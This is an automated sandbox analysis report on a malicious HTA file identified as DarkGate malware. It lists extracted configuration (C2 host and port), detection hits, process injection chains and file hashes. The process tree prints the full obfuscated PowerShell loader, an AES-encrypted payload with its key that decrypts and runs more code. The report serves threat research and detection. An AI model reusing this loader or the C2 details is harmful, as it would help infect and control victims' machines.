Analysis
-
max time kernel
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
submitted
05-02-2024 14:07
Static task
static1
Behavioral task
behavioral1
Sample
05022024_2208_chache.hta
Resource
win7-20231215-en
General
-
Target
05022024_2208_chache.hta
-
Size
73KB
-
MD5
26daad505b15a76a4ae1be76f9c77488
-
SHA1
70d2f0a9a4f51316f65ff8b895518c6fb824f4c7
-
SHA256
4644c5cfe036b53190d6f36a2d9e3067ea05622481092ab05b55e5754e89ba2e
-
SHA512
96e8cc6ea11bd22d9a3195f87c5d4e241e58a1c6fca2de4db1dab4a08d8cd4d4b7a9a51a7b478f16422c030cd675b7ab144015de8c87bcec03bc5c0568c26ffc
-
SSDEEP
768:kohVndK3EFiaID3u1cP/wTgdok7h/ZdmYu7aZD0fJgPKOjLxphC8U4u4EeUeEgFa:kobndK4IDeshU3gfALti5Oz
Malware Config
Extracted
darkgate
xiputin1
bizabiza.mywire.org
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
8094
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
IXVIPUIJ
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
xiputin1
Extracted
darkgate
6.1.7
xiputin1
bizabiza.mywire.org
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
8094
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
IXVIPUIJ
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
xiputin1
Signatures
-
Darkgate family
-
Detect DarkGate stealer 39 IoCs
resource yara_rule behavioral2/memory/3992-104-0x0000000006080000-0x00000000063CE000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-111-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-112-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-113-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-114-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/3992-117-0x0000000006080000-0x00000000063CE000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-122-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-124-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-128-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-129-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-130-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-126-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-132-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-133-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-134-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-135-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-136-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-137-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-138-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-139-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-140-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-141-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-142-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-143-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-144-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-145-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-146-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-147-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-148-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-149-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-150-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-151-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-152-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-153-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-154-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-155-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-156-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/1756-157-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 behavioral2/memory/2108-158-0x0000000000400000-0x0000000000470000-memory.dmp family_darkgate_v6 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3992 created 780 3992 Autoit3.exe 93 PID 2108 created 1368 2108 vbc.exe 53 -
Blocklisted process makes network request 2 IoCs
flow pid Process 15 4948 powershell.exe 17 4948 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 3992 Autoit3.exe -
Uses the VBS compiler for execution 1 TTPs
-
pid Process 2496 powershell.exe -
Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs
Using AutoIT for possible automate script.
pid Process 3992 Autoit3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3992 set thread context of 2108 3992 Autoit3.exe 95 PID 2108 set thread context of 1756 2108 vbc.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Autoit3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbc.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2496 powershell.exe 2496 powershell.exe 4948 powershell.exe 4948 powershell.exe 3992 Autoit3.exe 3992 Autoit3.exe 3992 Autoit3.exe 3992 Autoit3.exe 3992 Autoit3.exe 3992 Autoit3.exe 2108 vbc.exe 2108 vbc.exe 2108 vbc.exe 2108 vbc.exe 1756 vbc.exe 1756 vbc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2108 vbc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3084 wrote to memory of 2496 3084 mshta.exe 84 PID 3084 wrote to memory of 2496 3084 mshta.exe 84 PID 3084 wrote to memory of 2496 3084 mshta.exe 84 PID 2496 wrote to memory of 4948 2496 powershell.exe 88 PID 2496 wrote to memory of 4948 2496 powershell.exe 88 PID 2496 wrote to memory of 4948 2496 powershell.exe 88 PID 4948 wrote to memory of 3992 4948 powershell.exe 94 PID 4948 wrote to memory of 3992 4948 powershell.exe 94 PID 4948 wrote to memory of 3992 4948 powershell.exe 94 PID 3992 wrote to memory of 2108 3992 Autoit3.exe 95 PID 3992 wrote to memory of 2108 3992 Autoit3.exe 95 PID 3992 wrote to memory of 2108 3992 Autoit3.exe 95 PID 3992 wrote to memory of 2108 3992 Autoit3.exe 95 PID 3992 wrote to memory of 2108 3992 Autoit3.exe 95 PID 2108 wrote to memory of 1756 2108 vbc.exe 96 PID 2108 wrote to memory of 1756 2108 vbc.exe 96 PID 2108 wrote to memory of 1756 2108 vbc.exe 96 PID 2108 wrote to memory of 1756 2108 vbc.exe 96 PID 2108 wrote to memory of 1756 2108 vbc.exe 96
Processes
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1368
-
\??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exec:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1756
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\05022024_2208_chache.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $dosMCx = 'AAAAAAAAAAAAAAAAAAAAAJYy7XorWRa+qK18RLz3MACGVTIKVi/vdrN09kdAQH00Qn4s73pwYVuBD2RlZ1yXsBP2ZxjZgKK/f4r1gG0lS02I0qv+m8d422KPqJ+ltFIsCuPgS/xI2dwtPWMDLkdI20Clkwx5VZyCFeOdH1WIsbv4p1Pe5oFoOX9SyRVx90GHDHAA6DOeyMLE1xh8FCdnRUmpO6pBu7tBB9mA7hnCpklMO7II8c3/daXyugSWq1OjNU3R80IJUqfS8ek34F32k6+DOj1fUxbhf9jqZVuLdF42WOptJK4papSQRTb48+4bFSeQTg1k8LZW20JyRbP/sxjr2hR7P5xKHKtRblEXhPPLEi68IdKGwwR9ywLokeSsn23HO4dEG2ZFMmr2TvuFwIbegWNFyKDBw0iBOQqPsXcQ1LL9yl8GaRfBh7tDXOckFCpMVnQ4ZsNnsdroqz3o2qnFXhaqDoMzArWJzbl1F3yOpWkdxlqcl9mKAKjaRmxYH8xSBxHIGo0glG/WiHuMovynOXcXXh9Hh7tvnfR4Z8XcJbOBdduaGZzQgfOJcjQPkbl99gxEPCpR+AFkEc5QhNTRMOOk3POJ7cPD6VkHYYHY6uJAbx8QOEPph0d7YPQ/FKdxkI/tfMm9ah2acL21+COso6YMbzzmykNdOlzml25gmgBX1ZkUKiJRlMYFulkcxFFVnrPvMRifQ1U/9wilMy/LGTvskHqwq23XICS7ROV4UVcFqA6zkopDdFR24NHk1DdpeJRgjBoP/dv/MDa0XJseW+cJYLSL7C4vwoTde/9CiMwx1U0MhCOTXMDjZFPmUUSfRQlLhEOx43ZcB5KqA+H4G7/aBt14HuhutzT6KwXTjp9E0uH4aXQhDtH6mpJmhGuTGJG3Dq8uri8LoJlYdZsDaDoTotWCBSNieE50OA/wpX1q3h0N/trtKG5rCUYFzP/edxhrB7ecD9u265tHsHZNqhnsB/2r9mF+Nwvk080HbCYZzby2UZiApH8R0Gi7';$fZlRFWv = 'dnZWQ2RTQlpYQVZGV3NUUEhKSGhhYmhuS3hJUVVoZVk=';$KgUYArj = New-Object 'System.Security.Cryptography.AesManaged';$KgUYArj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KgUYArj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KgUYArj.BlockSize = 128;$KgUYArj.KeySize = 256;$KgUYArj.Key = [System.Convert]::FromBase64String($fZlRFWv);$iHuNw = [System.Convert]::FromBase64String($dosMCx);$uIavcLcj = $iHuNw[0..15];$KgUYArj.IV = $uIavcLcj;$ZLmvFdAFX = $KgUYArj.CreateDecryptor();$dcDqIMMEQ = $ZLmvFdAFX.TransformFinalBlock($iHuNw, 16, $iHuNw.Length - 16);$KgUYArj.Dispose();$UOwkrU = New-Object System.IO.MemoryStream( , $dcDqIMMEQ );$wzZeKR = New-Object System.IO.MemoryStream;$lUYoKGCdC = New-Object System.IO.Compression.GzipStream $UOwkrU, ([IO.Compression.CompressionMode]::Decompress);$lUYoKGCdC.CopyTo( $wzZeKR );$lUYoKGCdC.Close();$UOwkrU.Close();[byte[]] $SKbxu = $wzZeKR.ToArray();$Yotlw = [System.Text.Encoding]::UTF8.GetString($SKbxu);$Yotlw | powershell -2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Users\Admin\AppData\Roaming\Autoit3.exe"C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Command and Scripting Interpreter: AutoIT
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992
-
-
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:780
-
\??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exec:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2108
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5aaa22d2276f7dbc4117dece9c99d1994
SHA1880d2864e00f18fd75adccd222a71fcc01f19330
SHA2561fc8700133632b430753e50cc7a13273f7e70cbabc942c7f1764b43a65895447
SHA512fd192657cb734f6c42648a4ca1156293d6f316b9fc8e070d7970349ee3af58b8a2a97d76ae0889b0b83be8e67d3b79ba9289e31122254755a43f726d9b2e416d
-
Filesize
2KB
MD50aa30cb82b8891d5a57a64ed312a14fb
SHA1fcc5dc9d9d71026af3afb1abd007f75ea102e2ff
SHA256c53094f79b260343ba1efa7d8e62dfa6ab8cf275f947e4eb6bec200228342efb
SHA512e6d9eec3765d3f883e16374d956f31f20bc6147acdffe471540bad8a030b92a7dcfd4bcc10726b9e048a6e3a587fbf468121836c6126b4508a3b786fa721c333
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
32B
MD547eb7d01a3f91d9addcd5536f12e66b1
SHA10323a14b877b7d756d1e1cf4215b9c4b9a717d10
SHA25656ebf37acbfbc200719bb6e58fa0afcd708c7db7e93dffbb9d6c1cfe61804c24
SHA512d2822a5ba265c8321d38e57d226720def4f7e2c4e440e6c0cea78d2aa2182a1ea08cb7f553a20cf3ebd41a44264eae6ae800b93b7230331b8ab26bdb35478946
-
Filesize
574KB
MD5b40d033be435d8132bb87d4fe626dbd5
SHA1e293fd0360f12fbed69dc800d0d88e48245de41c
SHA2562d5bcc28a41a40b29819b33938f93a9cc6f52133f8bd9af932b29598f5cb69e1
SHA512672c62ceed3896f1440920c3e0974c1d9ff67b2ee20eca2d7477f2e8ca5a9b61e202ddb81c2d2658eb3bdd5b4900939c25899228f2cb395d8311ae7585924c9a
-
Filesize
76B
MD5cc6b1ac02758f11090e9154e6b9dd3db
SHA1784164026c0687d54bec579a957d6c64d0fa991f
SHA2565b23276f3bf0fe8087296a5bc05e10e951c1c9ed75167e322b880eb0294186de
SHA512c06018fa2c8a9b844c2b364ab7a24ec8db5521ea7466edd904c7fde3ecd832bbd055e77453759d34e54853d5347748398e9ae5c147e2751e2881803ea78a0ea2
-
Filesize
4B
MD5d6183c0b507fa0cc80e692b17fe65d9b
SHA14e1b7529a81f0193aa4db6f2eb7151736e1d3c21
SHA256ac21c6b07de3e558e1d77e85a8a225a7e6c79c59ba464414a5c3dd2f7a89c6c3
SHA5127849b2628183791dfe102f446788314a1c27297912247c07c80978eb195a5aa3f201756faba616723b9d4de10d8296c575aae534a710d348dc33916ec2ee5cbe
-
Filesize
4B
MD5448bbe677e06a4c03bec9f4459f90e4b
SHA14a007b484438591236f8762d097057d82c0767df
SHA256a987d6b557a754c83f363a26e22175c1d7f108e4fb7cc3ef47d979885c47ac08
SHA5129894a027ea9c2e417a4bc1b845153a494ace823a98f6a713dd1e12e0e53a9c99a7f0781635f212c00d97ea86ae54d628f8acaa2dd5d72cb3cfdb760bb5bdf0b0